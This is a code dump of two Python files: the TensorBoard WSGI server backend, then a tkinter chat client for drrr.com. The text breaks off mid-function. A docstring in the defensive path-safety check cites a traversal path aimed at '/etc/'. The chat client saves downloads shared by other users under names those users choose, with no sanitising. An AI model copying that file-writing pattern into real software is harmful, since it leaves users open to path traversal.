RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
class _OutputFormat(object):
"""An enum used to list the valid output formats for API calls.
Not all API calls support all formats (for example, only scalars and
compressed histograms support CSV).
"""
JSON = 'json'
CSV = 'csv'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer."""
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=purge_orphaned_data)
plugins = {
debugger_plugin.PLUGIN_PREFIX_ROUTE: debugger_plugin.DebuggerPlugin(),
projector_plugin.PLUGIN_PREFIX_ROUTE: projector_plugin.ProjectorPlugin(),
text_plugin.PLUGIN_PREFIX_ROUTE: text_plugin.TextPlugin(),
}
return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
def __init__(self, logdir, plugins, multiplexer, reload_interval):
"""Constructs the TensorBoard application.
Args:
logdir: the logdir spec that describes where data will be loaded.
may be a directory, or comma,separated list of directories, or colons
can be used to provide named directories
plugins: Map from plugin name to plugin application
multiplexer: The EventMultiplexer with TensorBoard data to serve
reload_interval: How often (in seconds) to reload the Multiplexer
Returns:
A WSGI application that implements the TensorBoard backend.
"""
self._logdir = logdir
self._plugins = plugins
self._multiplexer = multiplexer
self.tag = get_tensorboard_tag()
path_to_run = parse_event_files_spec(self._logdir)
if reload_interval:
start_reloading_multiplexer(self._multiplexer, path_to_run,
reload_interval)
else:
reload_multiplexer(self._multiplexer, path_to_run)
self.data_applications = {
DATA_PREFIX + LOGDIR_ROUTE:
self._serve_logdir,
DATA_PREFIX + SCALARS_ROUTE:
self._serve_scalars,
DATA_PREFIX + GRAPH_ROUTE:
self._serve_graph,
DATA_PREFIX + RUN_METADATA_ROUTE:
self._serve_run_metadata,
DATA_PREFIX + HISTOGRAMS_ROUTE:
self._serve_histograms,
DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
self._serve_compressed_histograms,
DATA_PREFIX + IMAGES_ROUTE:
self._serve_images,
DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
self._serve_image,
DATA_PREFIX + AUDIO_ROUTE:
self._serve_audio,
DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
self._serve_individual_audio,
DATA_PREFIX + RUNS_ROUTE:
self._serve_runs,
'/app.js':
self._serve_js
}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
for name in self._plugins:
try:
plugin = self._plugins[name]
plugin_apps = plugin.get_plugin_apps(self._multiplexer, self._logdir)
except Exception as e: # pylint: disable=broad-except
logging.warning('Plugin %s failed. Exception: %s', name, str(e))
continue
for route, app in plugin_apps.items():
path = DATA_PREFIX + PLUGIN_PREFIX + '/' + name + route
self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
@wrappers.Request.application
def _serve_logdir(self, request):
"""Respond with a JSON object containing this TensorBoard's logdir."""
return http_util.Respond(
request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
writer.writerow(['Wall time', 'Step', 'Value'])
writer.writerows(values)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(
request, '404 Not Found', 'text/plain; charset=UTF-8', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_histograms(self, request):
"""Given a tag and single run, return an array of histogram values."""
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Histograms(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_compressed_histograms(self, request):
"""Given a tag and single run, return an array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
if request.args.get('format') == _OutputFormat.CSV:
string_io = StringIO()
writer = csv.writer(string_io)
# Build the headers; we have two columns for timing and two columns for
# each compressed histogram bucket.
headers = ['Wall time', 'Step']
if compressed_histograms:
bucket_count = len(compressed_histograms[0].compressed_histogram_values)
for i in xrange(bucket_count):
headers += ['Edge %d basis points' % i, 'Edge %d value' % i]
writer.writerow(headers)
for compressed_histogram in compressed_histograms:
row = [compressed_histogram.wall_time, compressed_histogram.step]
for value in compressed_histogram.compressed_histogram_values:
row += [value.rank_in_bps, value.value]
writer.writerow(row)
return http_util.Respond(request, string_io.getvalue(), 'text/csv')
else:
return http_util.Respond(
request, compressed_histograms, 'application/json')
@wrappers.Request.application
def _serve_images(self, request):
"""Given a tag and list of runs, serve a list of images.
Note that the images themselves are not sent; instead, we respond with URLs
to the images. The frontend should treat these URLs as opaque and should not
try to parse information about them or generate them itself, as the format
may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
images = self._multiplexer.Images(run, tag)
response = self._image_response_for_run(images, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
"""Given a tag and list of runs, serve a list of audio.
Note that the audio clips themselves are not sent; instead, we respond with
URLs to the audio. The frontend should treat these URLs as opaque and should
not try to parse information about them or generate them itself, as the
format may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
audio_list = self._multiplexer.Audio(run, tag)
response = self._audio_response_for_run(audio_list, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
"""Serves an individual audio clip."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
audio = self._multiplexer.Audio(run, tag)[index]
return http_util.Respond(
request, audio.encoded_audio_string, audio.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
"""WSGI app serving a JSON object about runs and tags.
Returns a mapping from runs to tagType to list of tags for that run.
Args:
request: A werkzeug request
Returns:
A werkzeug Response with the following content:
{runName: {images: [tag1, tag2, tag3],
audio: [tag4, tag5, tag6],
scalars: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
firstEventTimestamp: 123456.789}}
"""
runs = self._multiplexer.Runs()
for run_name, run_data in runs.items():
try:
run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
run_name)
except ValueError:
logging.warning('Unable to get first event timestamp for run %s',
run_name)
run_data['firstEventTimestamp'] = None
return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
"""Serves the index page (i.e., the tensorboard app itself)."""
return self._serve_static_file(request, '/dist/index.html')
@wrappers.Request.application
def _serve_js(self, request):
"""Serves the JavaScript for the index page."""
return self._serve_static_file(request, '/dist/app.js')
def _serve_static_file(self, request, path):
"""Serves the static file located at the given path.
Args:
request: A werkzeug Request
path: The path of the static file, relative to the tensorboard/ directory.
Returns:
A werkzeug.Response application.
"""
# Strip off the leading forward slash.
orig_path = path.lstrip('/')
if not self._path_is_safe(orig_path):
logging.warning('path not safe: %s', orig_path)
return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
# Resource loader wants a path relative to //WORKSPACE/tensorflow.
path = os.path.join('tensorboard', orig_path)
# Open the file and read it.
try:
contents = resource_loader.load_resource(path)
except IOError:
# For compatibility with latest version of Bazel, we renamed bower
# packages to use '_' rather than '-' in their package name.
# This means that the directory structure is changed too.
# So that all our recursive imports work, we need to modify incoming
# requests to map onto the new directory structure.
path = orig_path
components = path.split('/')
components[0] = components[0].replace('-', '_')
path = ('/').join(components)
# Bazel keeps all the external dependencies in //WORKSPACE/external.
# and resource loader wants a path relative to //WORKSPACE/tensorflow/.
path = os.path.join('../external', path)
try:
contents = resource_loader.load_resource(path)
except IOError:
logging.warning('path %s not found, sending 404', path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)
mimetype, content_encoding = mimetypes.guess_type(path)
mimetype = mimetype or 'application/octet-stream'
return http_util.Respond(
request,
contents,
mimetype,
expires=3600,
content_encoding=content_encoding)
def __call__(self, environ, start_response): # pylint: disable=invalid-name
"""Central entry point for the TensorBoard application.
This method handles routing to sub-applications. It does simple routing
using regular expression matching.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec.
start_response: See WSGI spec.
Returns:
A werkzeug Response.
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
# Remove a trailing slash, if present.
clean_path = parsed_url.path
if clean_path.endswith('/'):
clean_path = clean_path[:-1]
# pylint: disable=too-many-function-args
if clean_path in self.data_applications:
return self.data_applications[clean_path](environ, start_response)
elif clean_path in TAB_ROUTES:
return self._serve_index(environ, start_response)
else:
return self._serve_static_file(request, clean_path)(environ,
start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir.split(','):
# Check if the spec contains group. A spec start with xyz:// is regarded as
# URI path spec instead of group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/'):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
def reload_multiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _reload_forever():
while True:
reload_multiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_reload_forever)
thread.daemon = True
thread.start()
return thread
def get_tensorboard_tag():
"""Read the TensorBoard TAG number, and return it or an empty string."""
tag = resource_loader.load_resource('tensorboard/TAG').strip()
return tag
|
main_part.py | # -- coding: utf-8 --
import requests
import time
import re
import json
import copy
import threading
import tkinter
import tkinter.messagebox
login_header = {
'Host': 'drrr.com',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
session_headers = {
'authority': 'drrr.com',
'method': 'POST',
'path': '/room/?ajax=1',
'scheme': 'https',
'accept': '*/*',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'zh-CN,zh;q=0.9',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://drrr.com',
'referer': None,
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'x-requested-with': 'XMLHttpRequest',
}
login_url = 'https://drrr.com/'
post_message_url = 'https://drrr.com/room/?ajax=1'
get_message_url = 'https://drrr.com/json.php?fast=1'
update_message_url = 'https://drrr.com/json.php?update=%s'
create_url = 'https://drrr.com/create_room/?'
session = requests.Session()
# 登陆
def login(user_name, room_name, roomInfos):
id = user_name # input("输入昵称: ")
session.get(login_url, headers=login_header)
response = session.get(login_url, headers=login_header, allow_redirects=False)
token = re.search('name="token" data-value="(.*?)"', response.text).group(1)
data = {
'name': '%s' % id,
'login': 'ENTER',
'token': token,
'direct-join': '',
'language': 'zh-CN',
'icon': 'zaika-2x',
}
session.post(login_url, headers=login_header, data=data)
room_id = None
for room in roomInfos:
if room['name'] == room_name:
room_id = room['roomId']
# room_id = lounge(room_name)
if not room_id:
room_id = create_room(room_name)
# room_id = lounge(room_name)
else:
room_name, room_id = join(room_id)
return room_name, room_id, session
# 大厅
def lounge(name):
lounge_url = 'https://drrr.com/lounge/'
login_header.update({'Referer': 'https://drrr.com/'})
session.get(lounge_url, headers=login_header)
login_header.update({'Referer': 'https://drrr.com/lounge/'})
room = session.get('https://drrr.com/lounge?api=json', headers=login_header)
try:
rooms = json.loads(room.text)['rooms']
for room in rooms:
if room['name'] == name:
room_id = room['roomId']
return room_id
except Exception as e:
print(str(e))
# 创建房间
def create_room(name, description='', limit=10, language='zh-CN', music='true'):
data = {
'name': name,
'description': description,
'limit': limit,
'language': language,
'submit': '创建房间'
}
if music == 1 or music == 'true':
music = 'true'
data.update({'music': music})
create_headers = copy.deepcopy(session_headers)
create_headers.update({'referer': 'https://drrr.com/create_room/?',
'path': '/create_room/?',
'cache - control': 'max - age = 0',
'accept-encoding': None})
session.post(url=create_url, data=data, headers=create_headers)
url = 'https://drrr.com/room/'
join_headers = {
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Referer': 'https://drrr.com/lounge',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
session.get(url, headers=join_headers)
return True
# 加入房间
def join(room_id):
join_headers = {
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Referer': 'https://drrr.com/lounge',
'Accept-Language': 'zh-CN,zh;q=0.9',
}
join_room_url = 'https://drrr.com/room/?id=%s' % room_id
response = session.get(url=join_room_url, headers=join_headers, allow_redirects=True)
if 'zh-CN' in response.text:
room_name = re.search('data-title="I\'m in “(.*?)”', response.text).group(1)
room_id = re.search('data-url=".*id=(.*?)"', response.text).group(1)
return room_name, room_id
else:
tkinter.messagebox.showerror(title="warning", message='已有相同用户名存在,请使用其他名称')
session.cookies = requests.utils.cookiejar_from_dict({'cookies': None}, cookiejar=None, overwrite=True)
return None, None
# 发送信息
def post_message(room_id, message, Entry, root, event=None):
session_headers.update({'referer': 'https://drrr.com/room/?id=%s' % room_id,
'method': 'POST'})
if message == '/leave':
leave()
root.destroy()
else:
while True:
global users
mslist = message.split(" ")
to = ''
if '/to' in mslist[0]:
message = mslist[2]
to_name = mslist[1]
for user in users:
if to_name == user['name']:
to = user['id']
data = {
'message': message,
'url': '',
'to': to,
}
if '/host' in mslist[0]:
host_name = mslist[1]
for user in users:
if host_name == user['name']:
data = {'new_host': user['id']}
elif '/kick' in mslist[0]:
try:
kick_name = mslist[1]
for user in users:
if kick_name == user['name']:
data = {'kick': user['id']}
except: pass
elif '/music' in mslist[0]:
try:
music_name = mslist[1]
music_url = mslist[2]
data = {
'music': 'music',
'name': music_name,
'url': music_url
}
except: pass
response = session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200 or response.status_code == 500:
break
try:
Entry.delete(0, tkinter.END)
except: pass
# 离开
def leave():
while True:
data = {
'message': '/leave',
'url': '',
'to': '',
}
response = session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200:
break
time.sleep(1)
first = 1
# 解析消息
def parse_message(messages, myname, Text, room_id, lb):
messages = json.loads(messages.text)
bold_font = "-family {Microsoft YaHei UI Light} -size 10 -weight " \
"bold -slant roman -underline 0 -overstrike 0"
font = "-family {Microsoft YaHei UI Light} -size 9 -weight " \
"normal -slant roman -underline 0 -overstrike 0"
global first, users
host = messages.get('host')
if messages.get('talks'):
for message in messages['talks']:
try:
name = message['user']['name']
except:
try:
name = message['from']['name']
id = message['from']['id']
except:pass
type = message['type']
Text.configure(foreground='#ffffff')
Text.configure(font=font)
if type == 'message':
if message.get('to'):
Text.tag_config('private', font=bold_font, foreground='blue')
Text.insert(tkinter.END, name, 'private')
#threading.Thread(target=lambda :tkinter.messagebox.showinfo(title='来自%s的私信' % name, message=message['message'])).start()
# tkinter.messagebox.showinfo(title='来自%s的私信' % name, message=message['message'])
if myname != name and first == 0:
threading.Thread(target=private_show, args=(message, name, room_id, id)).start()
elif myname != name:
Text.tag_config('name', font=bold_font, foreground='red')
Text.insert(tkinter.END, name, 'name')
else:
Text.tag_config('me', font=bold_font, foreground='yellow')
Text.insert(tkinter.END, name, 'me')
Text.configure(font=font)
content = ': ' + message['message'] + '\n\n'
Text.insert(tkinter.END, content)
elif type == 'me':
content = ' ✦' + name + ' ' + message['content'] + '\n\n'
Text.insert(tkinter.END, content)
elif type == 'roll':
content = ' ✦' + name + ' 摇到了 ' +message['to']['name'] + '\n\n'
Text.insert(tkinter.END, content)
elif type == 'join':
content = ' ✦' + name+' logged in.' + '\n\n'
Text.insert(tkinter.END, content)
if not first:
users = messages['users']
updatelst(lb, host=host)
elif type == 'leave':
content = ' ✦' + name + ' ' + message['message'][4:] + '\n\n'
Text.insert(tkinter.END, content)
if not first:
users = messages['users']
updatelst(lb, host=None)
elif type == 'new-host':
content = ' ✦' + name + ' is a new host' + '\n\n'
Text.insert(tkinter.END, content)
if not first:
users = messages['users']
updatelst(lb, host=host)
elif type == 'music':
content = ' ✦' + name +' shared music「%s」'% message['music']['name'] + '\n\n'
music_url = message['music']['url']
Text.insert(tkinter.END, content)
threading.Thread(target=play_music, args=(music_url,message['music']['name'])).start()
elif type == 'kick':
name = message['to']['name']
content = ' ✦' + name + ' lost the connection' + '\n\n'
Text.insert(tkinter.END, content)
if not first:
users = messages['users']
updatelst(lb, host=host)
Text.see(tkinter.END)
first = 0
def private_show(message, name, room_id, id):
top = tkinter.Tk()
top.geometry("322x271+526+349")
top.title("来自%s的私信" % name)
privateFrame = tkinter.Frame(top)
privateFrame.place(relx=-0.031, rely=-0.037, relheight=1.089, relwidth=1.071)
privateFrame.configure(relief='groove',
borderwidth="2",
background="#000000",
width=345,)
privateText = tkinter.Text(privateFrame)
privateText.place(relx=0.043, rely=0.068, relheight=0.685, relwidth=0.887)
privateText.configure(background="#000000",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
insertbackground="black",
selectbackground="#c4c4c4",
selectforeground="black",
width=304,
wrap='word',)
entry = tkinter.StringVar()
privateEntry = tkinter.Entry(privateFrame, textvariable=entry)
privateEntry.place(relx=0.043, rely=0.814, height=27, relwidth=0.742)
privateEntry.configure(background="#000000",
disabledforeground="#a3a3a3",
font="TkFixedFont",
foreground="#ffffff",
insertbackground="#ffffff",
relief='groove',
width=314,)
privateEntry.bind('<Return>', handleradaptor(private_post, message=privateEntry, id=id, room_id=room_id, root=top))
privateButton = tkinter.Button(privateFrame, command=lambda: private_post(event=None, message=privateEntry, id=id, room_id=room_id, root=top))
privateButton.place(relx=0.783, rely=0.814, height=28, width=55)
privateButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
text='''发送''',
width=59,)
privateText.insert(tkinter.END, name + ": " + message['message'] + '\n')
top.mainloop()
def handleradaptor(fun, **kwds):
'''事件处理函数的适配器,相当于中介'''
return lambda event, fun=fun, kwds=kwds: fun(event, **kwds)
def private_post(event, message, id, room_id, root, ):
message = message.get()
while True:
data = {
'message': message,
'url': '',
'to': id,
}
session_headers.update({'method': 'POST',
'referer': 'https://drrr.com/room/?id=%s' % room_id})
response = session.post(url=post_message_url, headers=session_headers, data=data)
if response.status_code == 200:
break
root.destroy()
flag = 0
# 获取信息
def get_message(id, Text, room_id, memberlb, queue):
global message, flag, users
headers = copy.deepcopy(session_headers)
headers.update({'method': 'GET', 'path': '/json.php?fast=1', 'accept-encoding': None})
while True:
if not flag:
try:
message = session.get(get_message_url, headers=headers)
parse_message(message, id, Text=Text, room_id=room_id, lb=memberlb)
info = json.loads(message.text)
users = info['users']
host = info['host']
updatelst(memberlb, host)
flag = 1
except: pass
else:
try:
update = json.loads(message.text)['update']
url = update_message_url % update
message = session.get(url, headers=headers)
parse_message(message, id, Text=Text, room_id=room_id, lb=memberlb)
except: pass
if not queue.empty():
if queue.get_nowait() == 'stop':
queue.task_done()
Text.delete(0.0, tkinter.END)
flag = 0
break
def get_message_thread(id, Text, room_id, memberlb, queue):
thread = threading.Thread(target=get_message, args=(id, Text, room_id, memberlb, queue))
thread.setDaemon(True)
thread.start()
users = []
message = ''
def updatelst(memberlb, host):
memberlb.delete(0, len(users) + 1)
for user in users:
if user['id'] == host:
memberlb.insert(tkinter.END, ('--host--<', user['name'], '>------------------'))
else:
memberlb.insert(tkinter.END, ('--------<', user['name'], '>------------------'))
def update_rooms(roomlb):
roomlb.delete(0, len(rooms)+1)
for room in rooms:
try:
if room['language'] == 'zh-CN':
roomlb.insert(tkinter.END, ('<' + room['name']+' %s/%s' % (room['total'], room['limit']) + '>------------------'))
except:
pass
# def get_room_thread(roomlb):
#
# def get_rooms(roomlb):
# global rooms
# login_header.update({'Referer': 'https://drrr.com/lounge/'})
# room = session.get('https://drrr.com/lounge?api=json', headers=login_header)
# rooms = json.loads(room.text)['rooms']
# update_rooms(roomlb)
# timer = threading.Timer(5, get_rooms, args=(roomlb, ))
# timer.setDaemon(True)
# timer.start()
#
# timer = threading.Timer(5, get_rooms, args=(roomlb,))
# timer.setDaemon(True)
# timer.start()
rooms = []
def get_room_thread(roomlb):
def get_room(roomlb):
global rooms
login_header.update({'Referer': 'https://drrr.com/lounge/'})
while True:
room = session.get('https://drrr.com/lounge?api=json', headers=login_header)
rooms = json.loads(room.text)['rooms']
update_rooms(roomlb)
time.sleep(5)
room_thread = threading.Thread(target=get_room, args=(roomlb, ))
room_thread.setDaemon(True)
room_thread.start()
volume = 0
def play_music(music_url, music_name):
answer = tkinter.messagebox.askquestion("播放音乐", "是否播放<%s>" % music_name )
if answer == 'yes':
global volume
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
}
response = requests.get(url=music_url, headers=headers)
with open('./mp3/%s.mp3' % music_name, 'wb+') as f:
f.write(response.content)
import minimu
song = minimu.load('./mp3/%s.mp3' % music_name)
volume = 20
song.volume(volume)
song.play()
music_root = tkinter.Tk()
music_root.geometry("322x47+162+348")
music_root.title(music_name)
music_root.resizable(0, 0)
try:
music_root.iconbitmap("./drrr.ico")
except: pass
music_root.configure(relief="groove")
music_root.configure(background="#000000")
playButton = tkinter.Button(music_root, command=lambda: resume(song))
playButton.place(relx=0.031, rely=0.213, height=28, width=49)
playButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''恢复''',)
pauseButton = tkinter.Button(music_root, command=lambda: pause(song))
pauseButton.place(relx=0.248, rely=0.213, height=28, width=49)
pauseButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
text='''暂停''',)
stopButton = tkinter.Button(music_root, command=lambda: stop(song, music_root))
